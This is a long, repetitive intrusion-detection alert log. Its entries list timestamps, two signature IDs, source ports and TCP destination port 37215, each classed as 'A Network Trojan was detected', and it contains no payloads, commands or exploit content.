                Timestamp:06/14/24-10:44:00.337203
                SID:2835222
                Source Port:48432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.185490
                SID:2829579
                Source Port:49588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.717457
                SID:2835222
                Source Port:36660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.344538
                SID:2829579
                Source Port:48228
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.111452
                SID:2829579
                Source Port:39334
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.616498
                SID:2829579
                Source Port:50444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.999967
                SID:2835222
                Source Port:44372
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.717459
                SID:2829579
                Source Port:46416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.880375
                SID:2835222
                Source Port:50960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.182784
                SID:2835222
                Source Port:58792
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.546806
                SID:2829579
                Source Port:48212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.519886
                SID:2835222
                Source Port:50150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.976929
                SID:2829579
                Source Port:46958
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.808748
                SID:2829579
                Source Port:56532
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.543848
                SID:2829579
                Source Port:38422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.703434
                SID:2829579
                Source Port:43580
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.275123
                SID:2829579
                Source Port:58064
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.666494
                SID:2829579
                Source Port:59220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.275927
                SID:2835222
                Source Port:52936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.150016
                SID:2835222
                Source Port:54394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.991250
                SID:2829579
                Source Port:51100
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.364668
                SID:2829579
                Source Port:33596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.452846
                SID:2835222
                Source Port:57660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.915243
                SID:2829579
                Source Port:34532
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.917802
                SID:2835222
                Source Port:46838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.321567
                SID:2829579
                Source Port:55790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.421287
                SID:2829579
                Source Port:58604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.828778
                SID:2829579
                Source Port:32936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.997466
                SID:2829579
                Source Port:45840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.660337
                SID:2829579
                Source Port:41766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.828278
                SID:2835222
                Source Port:59698
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.849050
                SID:2829579
                Source Port:54756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.968096
                SID:2835222
                Source Port:44238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.681308
                SID:2829579
                Source Port:38644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.090906
                SID:2829579
                Source Port:55660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.703102
                SID:2835222
                Source Port:33998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.177469
                SID:2835222
                Source Port:45370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.726303
                SID:2829579
                Source Port:55858
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.805037
                SID:2835222
                Source Port:34256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.803338
                SID:2835222
                Source Port:38860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.274323
                SID:2835222
                Source Port:53262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.661329
                SID:2835222
                Source Port:42150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.879972
                SID:2835222
                Source Port:59960
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.203123
                SID:2829579
                Source Port:55852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.452103
                SID:2829579
                Source Port:43484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.732683
                SID:2829579
                Source Port:42428
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.274647
                SID:2829579
                Source Port:46972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.243369
                SID:2835222
                Source Port:44996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.726982
                SID:2835222
                Source Port:43478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.034471
                SID:2829579
                Source Port:60302
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.805097
                SID:2835222
                Source Port:48054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.024414
                SID:2835222
                Source Port:40528
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.640453
                SID:2829579
                Source Port:35270
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.916737
                SID:2835222
                Source Port:43480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.274686
                SID:2835222
                Source Port:52770
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.941657
                SID:2835222
                Source Port:38838
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.321001
                SID:2829579
                Source Port:58312
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.203146
                SID:2835222
                Source Port:46864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.453004
                SID:2829579
                Source Port:60488
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.791011
                SID:2835222
                Source Port:40428
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.943209
                SID:2829579
                Source Port:56648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.292491
                SID:2829579
                Source Port:36000
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.011987
                SID:2835222
                Source Port:36526
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.453723
                SID:2835222
                Source Port:53796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.718444
                SID:2829579
                Source Port:49020
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.411239
                SID:2829579
                Source Port:54222
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.017476
                SID:2835222
                Source Port:44392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.645929
                SID:2835222
                Source Port:40276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.861589
                SID:2829579
                Source Port:49432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.546053
                SID:2829579
                Source Port:37612
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.718780
                SID:2829579
                Source Port:52194
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.291953
                SID:2835222
                Source Port:33720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.518603
                SID:2835222
                Source Port:40814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.805529
                SID:2835222
                Source Port:58172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.758947
                SID:2835222
                Source Port:56084
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.517737
                SID:2829579
                Source Port:33416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.663629
                SID:2829579
                Source Port:33880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.760322
                SID:2829579
                Source Port:43206
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.624494
                SID:2829579
                Source Port:37652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.999723
                SID:2829579
                Source Port:54832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.972194
                SID:2829579
                Source Port:51152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.419567
                SID:2829579
                Source Port:35256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.000222
                SID:2835222
                Source Port:53498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.991209
                SID:2835222
                Source Port:43366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.676877
                SID:2829579
                Source Port:56152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.034598
                SID:2835222
                Source Port:52536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.914480
                SID:2829579
                Source Port:57500
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.942817
                SID:2835222
                Source Port:53210
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.986209
                SID:2829579
                Source Port:46702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.407321
                SID:2829579
                Source Port:54252
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.470989
                SID:2829579
                Source Port:56630
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.715339
                SID:2829579
                Source Port:58560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.034729
                SID:2835222
                Source Port:35290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.290678
                SID:2829579
                Source Port:59996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.451430
                SID:2829579
                Source Port:35158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.813386
                SID:2835222
                Source Port:37230
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.183950
                SID:2829579
                Source Port:52846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.761827
                SID:2835222
                Source Port:36238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.968057
                SID:2835222
                Source Port:43248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.145819
                SID:2835222
                Source Port:51848
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.806896
                SID:2835222
                Source Port:60408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.293592
                SID:2835222
                Source Port:34750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.564331
                SID:2829579
                Source Port:48736
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.861492
                SID:2835222
                Source Port:48506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.806247
                SID:2829579
                Source Port:58966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.977705
                SID:2829579
                Source Port:36880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.295598
                SID:2829579
                Source Port:33392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.660617
                SID:2835222
                Source Port:42714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.942635
                SID:2835222
                Source Port:39644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.902425
                SID:2829579
                Source Port:43276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.944056
                SID:2835222
                Source Port:33256
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.242688
                SID:2829579
                Source Port:44068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.669446
                SID:2829579
                Source Port:52302
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.700803
                SID:2835222
                Source Port:50806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.203056
                SID:2829579
                Source Port:53466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.763918
                SID:2835222
                Source Port:42910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.777458
                SID:2829579
                Source Port:48998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.226270
                SID:2829579
                Source Port:58148
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.517331
                SID:2829579
                Source Port:40106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.809955
                SID:2829579
                Source Port:56438
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.729850
                SID:2835222
                Source Port:42018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.019184
                SID:2835222
                Source Port:60140
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.777185
                SID:2829579
                Source Port:41978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.907077
                SID:2829579
                Source Port:35702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.703953
                SID:2829579
                Source Port:40892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.185866
                SID:2835222
                Source Port:45082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.687577
                SID:2835222
                Source Port:52660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.115825
                SID:2835222
                Source Port:51546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.663169
                SID:2829579
                Source Port:55344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.762384
                SID:2829579
                Source Port:54106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.568295
                SID:2829579
                Source Port:60872
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.132119
                SID:2829579
                Source Port:44366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.717658
                SID:2829579
                Source Port:37142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.660818
                SID:2829579
                Source Port:51116
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.519604
                SID:2829579
                Source Port:58614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.185078
                SID:2835222
                Source Port:41664
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.976960
                SID:2835222
                Source Port:39858
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.186666
                SID:2829579
                Source Port:35002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.935478
                SID:2835222
                Source Port:33536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.243420
                SID:2835222
                Source Port:44596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.791265
                SID:2829579
                Source Port:55218
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.677782
                SID:2835222
                Source Port:48900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.897944
                SID:2835222
                Source Port:50262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.244271
                SID:2835222
                Source Port:57110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.147006
                SID:2829579
                Source Port:45428
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.907254
                SID:2829579
                Source Port:39978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.941619
                SID:2829579
                Source Port:42718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.811604
                SID:2829579
                Source Port:43576
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.934385
                SID:2829579
                Source Port:34480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.226473
                SID:2835222
                Source Port:57678
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.849191
                SID:2829579
                Source Port:52788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.149967
                SID:2829579
                Source Port:41896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.915343
                SID:2835222
                Source Port:59012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.944816
                SID:2829579
                Source Port:52548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.517283
                SID:2835222
                Source Port:55214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.616576
                SID:2835222
                Source Port:39238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.776994
                SID:2835222
                Source Port:52560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.732972
                SID:2835222
                Source Port:49242
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.671694
                SID:2829579
                Source Port:55154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.152405
                SID:2829579
                Source Port:50474
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.182109
                SID:2835222
                Source Port:52294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.862414
                SID:2835222
                Source Port:58772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.789458
                SID:2829579
                Source Port:50524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.424912
                SID:2829579
                Source Port:46370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.979950
                SID:2835222
                Source Port:56056
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.916427
                SID:2835222
                Source Port:38924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.545026
                SID:2835222
                Source Port:46266
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.734737
                SID:2835222
                Source Port:57610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.230960
                SID:2829579
                Source Port:34352
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.985208
                SID:2829579
                Source Port:33732
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.849607
                SID:2835222
                Source Port:48124
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.228877
                SID:2829579
                Source Port:51204
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.132781
                SID:2835222
                Source Port:51640
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.968617
                SID:2835222
                Source Port:53342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.074413
                SID:2835222
                Source Port:54962
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.663211
                SID:2835222
                Source Port:34212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.728780
                SID:2829579
                Source Port:58858
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.230087
                SID:2829579
                Source Port:45788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.469711
                SID:2829579
                Source Port:40844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.115936
                SID:2829579
                Source Port:35488
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.025201
                SID:2835222
                Source Port:40092
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.830691
                SID:2835222
                Source Port:38756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.228418
                SID:2829579
                Source Port:48414
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.715716
                SID:2829579
                Source Port:58492
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.092268
                SID:2829579
                Source Port:36154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.985613
                SID:2835222
                Source Port:38674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.087247
                SID:2829579
                Source Port:57978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.860301
                SID:2829579
                Source Port:40046
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.073530
                SID:2835222
                Source Port:52022
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.324415
                SID:2829579
                Source Port:45416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.761711
                SID:2835222
                Source Port:50598
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.779810
                SID:2829579
                Source Port:41924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.812030
                SID:2835222
                Source Port:36866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.616668
                SID:2835222
                Source Port:37202
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.243839
                SID:2835222
                Source Port:45690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.663092
                SID:2835222
                Source Port:47832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.810090
                SID:2835222
                Source Port:56888
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.669352
